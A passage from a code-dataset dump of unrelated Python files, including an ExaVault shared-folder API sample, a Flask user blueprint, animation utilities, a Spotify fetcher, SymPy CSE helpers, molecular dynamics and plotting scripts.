This call requires a single parameter path\n request_body = AddFolderRequestBody(path=folder_path)\n\n # We have to pass the API_KEY and ACCESS_TOKEN with every API call.\n result = resources_api.add_folder(API_KEY, ACCESS_TOKEN, body=request_body)\n\n # The addFolder method of the ResourcesApi returns a swagger_client.model.ResourceResponse object\n # See https://www.exavault.com/developer/api-docs/#operation/addFolder for\n # the details of the response object\n print(\"Created new folder {}\".format(result.data.attributes.path))\n\n except Exception as e:\n print('Exception when calling ResourcesApi.addFolder:', str(e))\n sys.exit(1)\n\n # If we got this far without the program ending, we were able to set up our folder\n # and now we can use the SharesApi to share the folder.\n #\n # We have to override the default configuration of the API object with an updated host URL so that our code\n # will reach the correct URL for the api.\n shares_api = SharesApi()\n shares_api.api_client.configuration.host = ACCOUNT_URL\n\n try:\n\n # API methods that take a JSON body, such as the addShare method, require us to submit an object with the\n # parameters we want to send to the API.\n # See https://www.exavault.com/developer/api-docs/#operation/addShare for the request body schema\n\n # - We want to add a password to our folder\n # - We are also going to allow visitors to upload and download\n # - Note that the folder_path variable contains the full path to the folder that was created earlier\n # - We could also have pulled the ID for the new folder out of the ResourceResponse object and used that\n # as a resource identifier here. For example, if the ID of the new folder is 23422, we could pass\n # id:23422 in the resource parameter of this call.\n request_body = AddShareRequestBody(\n type='shared_folder',\n name='share',\n resources=[folder_path],\n access_mode=AccessMode(\n download=True,\n upload=True,\n modify=False,\n delete=False\n ),\n password='99drowssaP?'\n )\n\n # We have to pass the API_KEY and ACCESS_TOKEN with every API call.\n result = shares_api.add_share(API_KEY, ACCESS_TOKEN, body=request_body)\n\n # The SharesApi::addShare method returns a swagger_client.model.RegularShareResponse object\n # See https://www.exavault.com/developer/api-docs/#operation/addShare for the response schema\n\n print(\"Created shared folder {} for {}\".format(result.data.attributes.hash, folder_path))\n print(\"Password to access the folder is {}\".format('99drowssaP?'))\n\n except Exception as e:\n print('Exception when calling SharesApi.addShare:', str(e))\n sys.exit(1)\n","sub_path":"sample-shared-folder.py","file_name":"sample-shared-folder.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"124946126","text":"from flask import render_template, Blueprint\nfrom flask_login import login_required\n\nfrom data_tools.wrappers.users import get_users, get_user, get_mailto_all\nfrom data_tools.template_models.entry_page import UserPageData\nfrom data_tools.template_models.list_table import UserListTableData\nfrom helpers import get_current_user, handle_exception_browser\n\nusers = Blueprint('users', __name__, url_prefix='/users')\n\n\n@users.route('/', methods=['GET'])\n@login_required\ndef render_user_list():\n try:\n current_user = get_current_user()\n if current_user.admin:\n mailto = get_mailto_all()\n else:\n mailto = None\n return render_template('pages/user_list.html',\n 
page_data=UserListTableData(current_user, get_users(current_user), mailto))\n except Exception as e:\n return handle_exception_browser(e)\n\n\n@users.route('/', methods=['GET'])\n@login_required\ndef render_user_profile(user_id=None):\n try:\n current_user = get_current_user()\n return render_template('pages/user_entry.html',\n page_data=UserPageData(current_user, get_user(current_user, user_id)))\n except Exception as e:\n return handle_exception_browser(e)\n","sub_path":"omics/omics_dashboard/blueprints/browser/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"314642102","text":"import copy\nimport numpy as np\nfrom . import posquat as pq\n\n\n\ndef compute_speed(positions):\n speed = np.zeros_like(positions[..., 0])\n\n speed[..., 1:] = np.linalg.norm(positions[..., :-1, :] - positions[..., 1:, :], axis=-1) * 30.0\n speed[..., 0] = speed[..., 1]\n return speed\n\n\ndef compute_distance(positions):\n speed = np.zeros_like(positions[..., 0])\n\n speed[..., 1:] = np.linalg.norm(positions[..., :-1, :] - positions[..., 1:, :], axis=-1)\n speed[..., 0] = speed[..., 1]\n return speed\n\n\ndef compute_vector(positions):\n disp = np.zeros_like(positions)\n\n disp[..., 1:, :] = positions[..., :-1, :] - positions[..., 1:, :]\n disp[..., 0, :] = disp[..., 1, :]\n return disp\n\n\ndef compute_bone_speed(skel, anim, bonename):\n id = skel.boneid(bonename)\n pos, _ = anim\n return compute_speed(pos[..., id, :])\n\n\ndef compute_bone_vector(skel, anim, bonename):\n id = skel.boneid(bonename)\n pos, _ = anim\n return compute_vector(pos[..., id, :])\n\n\ndef is_foot_static(footpositions, minimumspeed=10, maximumdistance=6):\n\n foot_speed = compute_speed(footpositions)\n foot_vector = compute_vector(footpositions)\n\n is_static = np.zeros_like(footpositions[..., 0])\n animlength = len(footpositions)\n\n total = np.zeros(3)\n laststartingframe = 0\n frame = 0\n while frame < animlength:\n total += foot_vector[frame]\n if np.linalg.norm(total) < maximumdistance:\n is_static[frame] = 1.0\n frame += 1\n else:\n total = 0\n laststartingframe = frame+1\n frame -= 1\n while frame >= 0:\n if is_static[frame] < 1.0 or foot_speed[frame] < minimumspeed:\n break\n is_static[frame] = 0.0\n frame -= 1\n frame = laststartingframe\n return is_static\n\n\ndef single_bone_lock(foot_anim, is_static):\n gpos, gquat = copy.deepcopy(foot_anim[0]), copy.deepcopy(foot_anim[1])\n speed = compute_speed(foot_anim[0])\n startframe = 0\n lastendrange = 0\n animlen = len(foot_anim[0])\n for frame in range(animlen):\n if frame == animlen - 1 or (startframe < frame and is_static[frame] < 0.5):\n gpos[startframe:frame, :] = np.mean(gpos[startframe:frame, :], axis=0)\n gquat[startframe:frame, :] = pq.quat_average(gquat[startframe:frame, :])\n\n # warp trajectory\n totalspeed = np.sum(speed[lastendrange:startframe + 1])\n start_offset = pq.sub(\n (gpos[lastendrange, :], gquat[lastendrange, :]),\n (foot_anim[0][lastendrange, :], foot_anim[1][lastendrange, :])\n )\n end_offset = pq.sub(\n (gpos[startframe, :], gquat[startframe, :]),\n (foot_anim[0][startframe, :], foot_anim[1][startframe, :])\n )\n t = 0\n for i in range(lastendrange, startframe + 1):\n t += speed[i] / totalspeed\n offset = pq.lerp(start_offset, end_offset, t)\n gpos[i, :], gquat[i, :] = pq.add(\n (foot_anim[0][i, :], foot_anim[1][i, :]),\n offset\n )\n\n startframe = frame + 1\n lastendrange = frame - 1\n elif is_static[frame] < 0.5:\n startframe 
= frame + 1\n return gpos, gquat\n\n\ndef get_foot_phase_mapping(skel, a, b):\n len_a = len(a[0])\n len_b = len(b[0])\n\n statics = np.zeros([max(len_a, len_b), 4])\n statics[:len_a, 0] = compute_speed(a[0][..., skel.leftfootid, :]) < 30\n statics[:len_a, 1] = compute_speed(a[0][..., skel.rightfootid, :]) < 30\n statics[:len_b, 2] = compute_speed(b[0][..., skel.leftfootid, :]) < 30\n statics[:len_b, 3] = compute_speed(b[0][..., skel.rightfootid, :]) < 30\n\n current = statics[0, :]\n start_a_range = 0\n start_b_range = 0\n frame_a = 0\n frame_b = 0\n ranges_info = []\n while frame_a < len_a or frame_b < len_b:\n # compute the range when the animations matches\n while frame_a < len_a and statics[frame_a, 0] == current[0] and statics[frame_a, 1] == current[1]:\n frame_a += 1\n while frame_b < len_b and statics[frame_b, 2] == current[2] and statics[frame_b, 3] == current[3]:\n frame_b += 1\n\n ranges_info.append((\n start_a_range, frame_a,\n start_b_range, frame_b,\n current[0], current[1], current[2], current[3]\n ))\n\n # update the values for the next range\n start_a_range = frame_a\n start_b_range = frame_b\n if start_a_range >= len_a:\n start_a_range = len_a - 1\n if start_b_range >= len_b:\n start_b_range = len_b - 1\n assert(statics[start_a_range, 0] == statics[start_b_range, 2])\n assert (statics[start_a_range, 1] == statics[start_b_range, 3])\n current = np.array([statics[start_a_range, 0],\n statics[start_a_range, 1],\n statics[start_b_range, 2],\n statics[start_b_range, 3]])\n\n return ranges_info\n\n\ndef get_projected_feet_on_ground(skel, anim, left_foot_positions=None, right_foot_positions=None):\n pos = np.zeros_like(anim[0][..., :2, :])\n quats = np.zeros_like(anim[1][..., :2, :])\n if left_foot_positions is None:\n left_foot_positions = anim[0][..., skel.leftfootid, :]\n if right_foot_positions is None:\n right_foot_positions = anim[0][..., skel.rightfootid, :]\n quats[..., 0, :] = copy.deepcopy(anim[1][..., 0, :])\n quats[..., 1, :] = copy.deepcopy(anim[1][..., 0, :])\n pos[..., 0, :] = copy.deepcopy(left_foot_positions)\n pos[..., 1, :] = copy.deepcopy(right_foot_positions)\n pos[..., 0, 1] = 0\n pos[..., 1, 1] = 0\n return pos, quats\n\n\ndef offset_bone_to_start_at(anim, start):\n rootpos, rootquat = start\n gpos, gquat = anim\n\n repeater_pos_anims_frames = np.ones_like(gpos[:, 0, np.newaxis].repeat(3, axis=-1))\n repeater_quat_anims_frames = np.ones_like(gquat[:, 0, np.newaxis].repeat(4, axis=-1))\n\n rootpos = rootpos * repeater_pos_anims_frames\n rootquat = rootquat * repeater_quat_anims_frames\n\n original_pos = gpos[0, :] * repeater_pos_anims_frames\n original_quat = gquat[0, :] * repeater_quat_anims_frames\n inverse_original_root = pq.inv(None, original_pos, original_quat)\n\n relative_root = pq.mult(anim, inverse_original_root)\n return pq.mult(relative_root, (rootpos, rootquat))\n\n\ndef extract_incremental_anim(anim):\n npos, nquat = np.zeros_like(anim[0]), np.zeros_like(anim[1])\n gpos, gquat = anim\n\n repeater_pos = np.ones_like(gpos[0, ..., 0, np.newaxis].repeat(3, axis=-1))\n repeater_quat = np.ones_like(gquat[0, ..., 0, np.newaxis].repeat(4, axis=-1))\n\n npos[0, ...] = np.zeros(3) * repeater_pos\n nquat[0, ...] = np.array([1, 0, 0, 0]) * repeater_quat\n\n npos[1:, ...], nquat[1:, ...] 
= pq.mult(\n (gpos[1:, ...], gquat[1:, ...]),\n pq.inv((gpos[:-1, ...], gquat[:-1, ...]))\n )\n\n return npos, nquat\n\n\ndef convert_incremental_anim(anim, start_pose):\n npos, nquat = np.zeros_like(anim[0]), np.zeros_like(anim[1])\n gpos, gquat = anim\n\n lastpos, lastquat = start_pose\n\n for f in range(len(gpos)):\n npos[f, ...], nquat[f, ...] = pq.mult(\n (gpos[f, ...], gquat[f, ...]),\n (lastpos, lastquat)\n )\n lastpos, lastquat = npos[f, ...], nquat[f, ...]\n return npos, nquat\n\n\ndef smooth_trajectory(anim, steps=5):\n start_pose = anim[0][0, ...], anim[1][0, ...]\n ipos, iquat = extract_incremental_anim(anim)\n\n for i in range(steps):\n ipos[1:, ...], iquat[1:, ...] = pq.lerp(\n (ipos[1:, ...], iquat[1:, ...]),\n (ipos[:-1, ...], iquat[:-1, ...]),\n 0.5\n )\n return convert_incremental_anim((ipos, iquat), start_pose)","sub_path":"animation/npk/animation_framework/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"198645478","text":"from util import SpotifyUtil\r\nimport config\r\nimport os\r\n\r\nITEM_LIMIT=50\r\nDATA_PATH='data'\r\nDATA_DICT = {\r\n 'songplays': {'current_user_recently_played': 'user-read-recently-played'},\r\n 'top_artists': {'current_user_top_artists': 'user-top-read'},\r\n 'top_tracks': {'current_user_top_tracks': 'user-top-read'}\r\n}\r\n\r\ndef main():\r\n\r\n # Instantiate a SpotifyUtil object \r\n spotifyutil = SpotifyUtil(username=config.USERNAME,\r\n client_id=config.CLIENT_ID,\r\n client_secret=config.CLIENT_SECRET,\r\n redirect_uri=config.REDIRECT_URI)\r\n \r\n # Retrieve data from Spotify\r\n for data, scope_dict in DATA_DICT.items():\r\n print(f'--GETTING {data}--')\r\n for query, scope in scope_dict.items():\r\n df = spotifyutil.get_spotify_data(scope=scope, query=query, limit=ITEM_LIMIT)\r\n\r\n # Write data to spotify_analytics/data\r\n df.to_csv(os.path.join(DATA_PATH, f'{data}.csv'), index=False, encoding='utf-8')\r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"510076020","text":"\"\"\" Optimizations of the expression tree representation for better CSE\nopportunities.\n\"\"\"\nfrom sympy.core import Add, Basic, Expr, Mul\nfrom sympy.core.basic import preorder_traversal\nfrom sympy.core.exprtools import factor_terms\nfrom sympy.utilities.iterables import default_sort_key\n\n\nclass Neg(Expr):\n \"\"\" Stub to hold negated expression.\n \"\"\"\n __slots__ = []\n\n\ndef sub_pre(e):\n \"\"\" Replace y - x with Neg(x - y) if -1 can be extracted from y - x.\n \"\"\"\n reps = [a for a in e.atoms(Add) if a.could_extract_minus_sign()]\n\n # make it canonical\n reps.sort(key=default_sort_key)\n\n e = e.subs([(a, Mul(-1, -a, evaluate=False)) for a in reps])\n # now replace any persisting Adds, a, that can have -1 extracted with Neg(-a)\n if isinstance(e, Basic):\n negs = {}\n for a in sorted(e.atoms(Add), key=default_sort_key):\n if a in reps or a.could_extract_minus_sign():\n negs[a] = Neg(-a)\n e = e.xreplace(negs)\n return e\n\n\ndef sub_post(e):\n \"\"\" Replace Neg(x) with -x.\n \"\"\"\n replacements = []\n for node in preorder_traversal(e):\n if isinstance(node, Neg):\n replacements.append((node, -node.args[0]))\n for node, replacement in replacements:\n e = e.xreplace({node: replacement})\n\n return 
e\n\ndefault_optimizations = [\n    (sub_pre, sub_post),\n    (factor_terms, None),\n]\n","sub_path":"sympy/simplify/cse_opts.py","file_name":"cse_opts.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"622833437","text":"from django.db import models\nfrom datetime import datetime\nfrom django.utils import timezone\n# Create your models here.\n\nclass Contact(models.Model):\n    name = models.CharField(max_length=30)\n    email = models.EmailField(max_length=30)\n    subject = models.CharField(max_length=50)\n    message = models.TextField(max_length=500)\n    createdate = models.DateField(\"Date\", default=timezone.now)\n\n    def __str__(self):\n        return self.email\n","sub_path":"qijiexue/Resume/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"376512987","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport matplotlib as mpl \nimport matplotlib.pyplot as plt\n\ndef f7(seq):\n    seen = set()\n    seen_add = seen.add\n    return [ x for x in seq if not (x in seen or seen_add(x))]\n\nmpl.rc('text', usetex=True)\nmpl.rc('font', family='serif')\nmpl.rcParams['text.latex.unicode']=True\n\ndef main():\n    data = [line.strip() for line in open('unweighted', 'r')]\n    x = []\n    y = []\n\n    start = data[1].split('/')\n    goal = data[-2].split('/')\n\n    start = [int(i) for i in start]\n    goal = [int(i) for i in goal]\n\n    data = f7(data)\n\n    for d in data[:-2]:\n        if ('E' == d[0]):\n            continue\n        numbers = d.split('/')\n        x.append(numbers[0])\n        y.append(numbers[1])\n\n    fig = plt.figure()\n    ax = fig.gca()\n    ax.set_xlim([0, 350])\n    ax.set_ylim([0, 350])\n#    ax.xlim()\n\n    for tick in ax.xaxis.get_major_ticks():\n        tick.label.set_fontsize(20) \n\n    for tick in ax.yaxis.get_major_ticks():\n        tick.label.set_fontsize(20) \n\n    ax.annotate('Start: ' + str(start[0]) + '/' + str(start[1]), xy=(start[0], start[1]), xytext=(start[0] + 30, start[1]), fontsize=20)\n    ax.annotate('Goal: ' + str(goal[0]) + '/' + str(goal[1]), xy=(goal[0], goal[1]), xytext=(goal[0] + 15, goal[1]), fontsize=20)\n\n    plt.scatter(x,y, color='#848482', marker='.')\n    plt.plot(start[0], start[1], color='#000000', marker='o')\n    plt.plot(goal[0], goal[1], color='#000000', marker='o')\n\n    plt.xlabel(r'', fontsize=20)\n    plt.ylabel(r'', fontsize=20)\n\n#    plt.grid(True)\n#    plt.show()\n    fig.savefig('fig2.png', bbox_inches='tight')\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"doc/documentation/data/expansions/expansion_plot.py","file_name":"expansion_plot.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"379574746","text":"import time\n\nfrom neutron_lib import worker\n\nfrom oslo_log import log as logging\nfrom oslo_service import loopingcall\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass OmnipathWorker(worker.BaseWorker):\n    def __init__(self, sync_func, sync_time=None):\n        self._sync_func = sync_func\n        self._sync_time = 60\n        if sync_time:\n            self._sync_time = sync_time\n        self._loop = None\n        super(OmnipathWorker, self).__init__()\n\n    def start(self):\n        super(OmnipathWorker, self).start()\n        if self._loop is None:\n            self._loop = loopingcall.FixedIntervalLoopingCall(self._sync_func)\n            LOG.info(\"Starting omnipath worker\")\n            self._loop.start(interval=self._sync_time)\n\n    def stop(self):\n        if self._loop is not None:\n            LOG.info(\"Stopping omnipath worker\")\n            self._loop.stop()\n\n    def wait(self):\n        if self._loop is not None:\n            LOG.info(\"Waiting omnipath worker\")\n            self._loop.wait()\n            self._loop = None\n\n    def reset(self):\n        LOG.info(\"Resetting omnipath worker\")\n        self.stop()\n        self.wait()\n        self.start()\n","sub_path":"neutron/plugins/ml2/drivers/omnipath/mechanism_driver/common/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"195291616","text":"#*********************************************************************************\r\n#* Copyright (C) 2016-2021 Alexey V. Akimov\r\n#*\r\n#* This file is distributed under the terms of the GNU General Public License\r\n#* as published by the Free Software Foundation, either version 3 of\r\n#* the License, or (at your option) any later version.\r\n#* See the file LICENSE in the root directory of this distribution\r\n#* or .\r\n#*\r\n#*********************************************************************************/\r\n###################################################################\n# This is a classical all-atomic MD \n###################################################################\n\nimport sys\r\nimport cmath\r\nimport math\r\nimport os\r\n\r\nif sys.platform==\"cygwin\":\r\n    from cyglibra_core import *\r\nelif sys.platform==\"linux\" or sys.platform==\"linux2\":\r\n    from liblibra_core import *\r\n\r\nfrom libra_py import *\r\n\n \n\ndef main():\n\n    rnd = Random()\n\n    #--------------------- Initialization ----------------------\n\n    # Create Universe and populate it\n    U = Universe(); LoadPT.Load_PT(U, os.getcwd()+\"/elements.txt\")\n\n    # Create force field\n    uff = ForceField({\"bond_functional\":\"Harmonic\", \"angle_functional\":\"Fourier\",\n                      \"dihedral_functional\":\"General0\", \"oop_functional\":\"Fourier\",\n                      \"mb_functional\":\"LJ_Coulomb\",\"R_vdw_on\":40.0,\"R_vdw_off\":55.0 })\n    LoadUFF.Load_UFF(uff,\"uff.dat\")\r\n\r\n\r\n    # Create molecular system and initialize the properties\n    syst = System()\n\n    LoadMolecule.Load_Molecule(U, syst, \"Pc-C60.ent\", \"pdb\")\n\n    syst.determine_functional_groups(0) # do not assign rings\n    syst.init_fragments()\n    print(\"Number of atoms in the system = \", syst.Number_of_atoms)\n    print(\"Number of bonds in the system = \", syst.Number_of_bonds)\n    print(\"Number of angles in the system = \", syst.Number_of_angles)\n    print(\"Number of dihedrals in the system = \", syst.Number_of_dihedrals)\n    print(\"Number of impropers in the system = \", syst.Number_of_impropers)\n    atlst1 = list(range(1,syst.Number_of_atoms+1))\n\n    # Creating Hamiltonian and initialize it\n    ham = Hamiltonian_Atomistic(1, 3*syst.Number_of_atoms)\r\n    ham.set_Hamiltonian_type(\"MM\")\n    ham.set_interactions_for_atoms(syst, atlst1, atlst1, uff, 1, 0) # 0 - verb, 0 - assign_rings\n    ham.show_interactions_statistics()\n\n\n    # Bind Hamiltonian and the system \n    ham.set_system(syst); ham.compute(); print(\"Energy = \", ham.H(0,0), \" a.u.\")\n\r\n    # Electronic DOFs\r\n    el = Electronic(1,0)\r\n\r\n\r\n    # Nuclear DOFs\r\n    mol = Nuclear(3*syst.Number_of_atoms)\r\n\r\n    # Initialize MD variables\r\n    nve_md.nve_md_init(syst, mol, el, ham)\r\n\r\n\r\n\r\n    #=================== Propagation ====================\r\n    \r\n    ########################## Cooling #################################\r\n\r\n    md = MD({\"max_step\":100,\"ensemble\":\"NVT\",\"integrator\":\"DLML\",\"terec_exp_size\":10,\"dt\":20.0,\"n_medium\":1,\"n_fast\":1,\"n_outer\":1})\n    md.show_info()\n    \r\n    # 
Thermostat\n    therm = Thermostat({\"Temperature\":278.0,\"Q\":100.0,\"thermostat_type\":\"Nose-Hoover\",\"nu_therm\":0.001,\"NHC_size\":5})\n    therm.show_info()\n\n\n    ST = State() \n    ST.set_system(syst)\n    ST.set_thermostat(therm)\n    ST.set_md(md)\n\n    ST.init_md(mol, el, ham, rnd) \n\n\n\n    f = open(\"_en_cooling.txt\",\"w\")\r\n    f.close()\r\n\r\n\r\n    for i in range(100):\r\n        syst.set_atomic_q(mol.q)\r\n        syst.print_xyz(\"_mol_cooling.xyz\",i)\r\n\r\n        ST.run_md(mol, el, ham)\r\n        ekin = ST.E_kin; epot = ST.E_pot\r\n        ST.cool()\r\n\r\n        f = open(\"_en_cooling.txt\",\"a\")\r\n        f.write(\"i= %3i ekin= %8.5f epot= %8.5f etot= %8.5f H_NP= %8.5f curr_T= %8.5f\\n\" % (i, ekin, epot, ST.E_tot, ST.H_NP, ST.curr_T ))\r\n        f.close()\r\n\r\n\r\n    ########################## Production MD #################################\r\n\r\n    syst.init_atom_velocities(300.0, rnd) # must be this !!!\r\n#    syst.init_fragment_velocities(300.0, rnd)\r\n\r\n    f = open(\"_en_md.txt\",\"w\")\r\n    f.close()\r\n    md.dt = 40.0 \r\n    md.max_step = 10\r\n\r\n    for i in range(1000):\r\n        syst.set_atomic_q(mol.q)\r\n        syst.print_xyz(\"_mol_md.xyz\",i)\r\n\r\n        ST.run_md(mol, el, ham)\r\n\r\n        f = open(\"_en_md.txt\",\"a\")\r\n        f.write(\"i= %3i ekin= %8.5f epot= %8.5f etot= %8.5f H_NP= %8.5f curr_T= %8.5f\\n\" % (i, ST.E_kin, ST.E_pot, ST.E_tot, ST.H_NP, ST.curr_T ))\r\n        f.close()\r\n\r\n\r\nmain()\r\n\r\n","sub_path":"13_force_fields_and_classical_md/4_mm_md/2_atomistic_md/1_SubPc-C60/case3/run_aa_md_state.py","file_name":"run_aa_md_state.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"648462409","text":"import time\nfrom src import utilities\nfrom src.aconf import (STYLESHEET, \n                       WEBSITE, \n                       PDB2PQR_OPAL_URL,\n                       HAVE_PDB2PQR_OPAL,\n                       INSTALLDIR,\n                       TMPDIR,\n                       MAXATOMS, \n                       PDB2PQR_VERSION)\n\ndef setID(time):\n    \"\"\"\n    Given a floating point time.time(), generate an ID.\n    Use the tenths of a second to differentiate.\n\n    Parameters\n        time: The current time.time() (float)\n    Returns\n        id : The file id (string)\n    \"\"\"\n    strID = \"%s\" % time\n    # period = string.find(strID, \".\")\n    period = strID.find(\".\")\n    id = \"%s%s\" % (strID[:period], strID[(period+1):(period+2)])\n    return id\n\n\ndef redirector(name, weboptions):\n    \"\"\"\n    Prints a page which redirects the user to querystatus.cgi and writes starting time to file\n    \"\"\"\n    \n    redirectWait = 3\n\n    utilities.startLogFile(name, 'pdb2pqr_start_time', str(time.time()))\n    \n    jobid = int(name)\n    \n    analiticsDict = weboptions.getOptions()\n    \n    events = {}\n    \n    events['submission'] = analiticsDict['pdb']+'|'+str(\"localhost:5000\")\n    # events['submission'] = analiticsDict['pdb']+'|'+str(os.environ[\"REMOTE_ADDR\"])\n    del analiticsDict['pdb']\n    \n    events['titration'] = str(analiticsDict.get('ph'))\n    if 'ph' in analiticsDict:\n        del analiticsDict['ph']\n    \n    events['apbsInput'] = str(analiticsDict.get('apbs'))\n    del analiticsDict['apbs']\n    \n    #Clean up selected extensions output\n    if 'selectedExtensions' in analiticsDict:\n        analiticsDict['selectedExtensions'] = ' '.join(analiticsDict['selectedExtensions'])\n    \n    options = ','.join(str(k)+':'+str(v) for k,v in analiticsDict.items())\n    events['options']=options\n\n    eventsScriptString = ''\n    for event in events:\n        eventsScriptString += utilities.getEventTrackingString(category='submissionData',\n                                                               action=event, \n                                                               label=events[event]) \n    \n    redirectURL = \"{website}jobstatus?jobid={jobid}\".format(website=WEBSITE, \n                                                            jobid=jobid)\n\n# string = \"\"\"\n# \n# 
\n# {trackingscript}\n# \n# \n# \n# \n#    \n# You are being automatically redirected to a new location.    \n# If your browser does not redirect you in {wait} seconds, or you do\n# not wish to wait, click here
    . \n# \n# \"\"\".format(trackingscript=utilities.getTrackingScriptString(jobid=jobid), \n# trackingevents=eventsScriptString, redirectURL=redirectURL, wait=redirectWait, website=WEBSITE)\n # return string\n return redirectURL\n","sub_path":"src/workflow/legacy/pdb2pqoldutil.py","file_name":"pdb2pqoldutil.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"448259619","text":"import os\nimport glob\nimport pickle\nimport re\n\n# Our numerical workhorses\nimport numpy as np\nimport pandas as pd\n\n# Import the project utils\nimport sys\nsys.path.insert(0, '../analysis/')\nimport mwc_induction_utils as mwc\n\n# Import matplotlib stuff for plotting\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n# Seaborn, useful for graphics\nimport seaborn as sns\n\nmwc.set_plotting_style()\n\n#===============================================================================\n# Read the data\n#===============================================================================\n\ndatadir = '../../data/'\ndf = pd.read_csv(datadir + 'flow_master.csv', comment='#')\n\n# Now we remove the autofluorescence and delta values\ndf = df[(df.rbs != 'auto') & (df.rbs != 'delta') & (df.IPTG_uM == 0)]\n\n# Let's import the data from HG 2011 and RB 2014\ndf_old = pd.read_csv(datadir + 'tidy_lacI_titration_data.csv', comment='#')\ndf_old = df_old[df_old.operator != 'Oid']\n#===============================================================================\n# O2 RBS1027\n#===============================================================================\n# Load the flat-chain\nwith open('../../data/mcmc/main_text_KaKi.pkl', 'rb') as file:\n unpickler = pickle.Unpickler(file)\n gauss_flatchain = unpickler.load()\n gauss_flatlnprobability = unpickler.load()\n\n# map value of the parameters\nmax_idx = np.argmax(gauss_flatlnprobability, axis=0)\nea, ei, sigma = gauss_flatchain[max_idx]\n\n#===============================================================================\n# Plot the theory vs data for all 3 operators\n#===============================================================================\n\n## Flow Data ##\n# Define the number of repressors for the theoretical predictions\nr_array = np.logspace(0, 3.5, 100)\n# Set the colors for the strains\ncolors = sns.color_palette('colorblind', n_colors=4)\n\n# Define the operators and their respective energies\noperators = ['O1', 'O2', 'O3']\nenergies = {'O1': -15.3, 'O2': -13.9, 'O3': -9.7, 'Oid': -17}\n\n# Initialize the plot to set the size\n#fig = plt.figure(figsize=(4.5, 4.5))\nsns.set_context('paper')\nfig = plt.figure()\nax = plt.subplot(111, aspect='equal')\nplt.axis('scaled')\n\n## HG and RB data ##\ndf_group = df_old.groupby('operator')\ni = 0\nfor group, data in df_group:\n # Extract HG data\n garcia = data[data.author == 'garcia']\n ax.plot(garcia.repressor, garcia.fold_change, color=colors[i],\n lw=0, marker='o', label='', alpha=0.75)\n # Extract RB data\n brewster = data[data.author == 'brewster']\n ax.plot(brewster.repressor, brewster.fold_change, color=colors[i],\n lw=0, marker='D', label='', alpha=0.75)\n i += 1\n\n# Group data by operator\ndf_group = df.groupby('operator')\n\n# initialize counter (because of df_group)\ni = 0\n\nfor group, data in df_group:\n # Compute the theoretical fold change for this operator\n fc = mwc.fold_change_log(np.array([0]), ea, ei, 4.5,\n r_array / 2, data.binding_energy.unique())\n ax.plot(r_array, fc, color=colors[i],\n label=group 
+ r' $\\Delta\\varepsilon_{RA} =$' +\n str(data.binding_energy.unique()[0]) + ' $k_BT$')\n # compute the mean value for each concentration\n fc_mean = data.groupby('repressors').fold_change_A.mean()\n # compute the standard error of the mean\n fc_err = data.groupby('repressors').fold_change_A.std() / \\\n np.sqrt(data.groupby('repressors').size())\n log_fc_err = fc_mean - 10**(np.log10(fc_mean) -\n fc_err / fc_mean / np.log(10))\n\n log_fc_err = np.vstack([log_fc_err, 10**(np.log10(fc_mean) +\n fc_err / fc_mean / np.log(10)) -\n fc_mean])\n # plot the experimental data\n ax.errorbar(fc_mean.index * 2, fc_mean,\n yerr=log_fc_err,\n fmt='o', markeredgecolor=colors[i], label='',\n markerfacecolor='white', markeredgewidth=2)\n i += 1\n\nax.plot([], [], marker='o',\n markeredgecolor='k', markerfacecolor='w', markeredgewidth=2,\n label='flow cytometry', lw=0)\nax.plot([], [], marker='o', color='k', alpha=0.75,\n label='HG & RP 2011,\\nMiller assay', lw=0)\nax.plot([], [], marker='D', color='k', alpha=0.75,\n label='RB et al. 2014,\\ntime lapse microscopy', lw=0)\nax.set_xscale('log')\nax.set_yscale('log')\nax.set_xlabel('repressors / cell')\nax.set_ylabel('fold-change')\nax.set_xlim(right=10**3.5)\nax.set_ylim(top=2)\nleg = ax.legend(loc='lower left', fontsize=8)\nleg.set_zorder(1)\n\nmwc.scale_plot(fig, 'single_plot_tall')\nplt.tight_layout()\nplt.savefig('../../figures/SI_figs/figS10.pdf', bbox_inches='tight')\n","sub_path":"code/figures/figS10.py","file_name":"figS10.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"358418109","text":"\"\"\"\nA test for nested class\nSTOF: https://stackoverflow.com/a/719718/8435726\n\"\"\"\n\nclass Dog(object):\n\n class Cat(object):\n def __init__(self, age):\n self.age = age\n\n def meow(self):\n return \"I want fish!\"\n\n def __init__(self, age):\n self.age = age\n\n def say(self, content):\n if content == \"Wooh\":\n return \"WOOH!! WOOH!! WOOH!!\"\n\n elif content == \"Meow\":\n return Dog(1).Cat(0).meow()\n\n else:\n return \"Fuck off!\"\n\n\ndog = Dog(1)\ncat = 